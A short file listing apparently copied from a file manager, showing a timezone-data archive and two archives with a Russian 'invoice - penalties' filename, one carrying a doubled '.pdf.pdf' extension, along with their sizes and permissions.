zoneinfo.tar.gz File 1.01 KB 0644
счет---пени.pdf.pdf.tar.gz File 74.96 KB 0644
счет---пени.pdf.tar File 80.5 KB 0644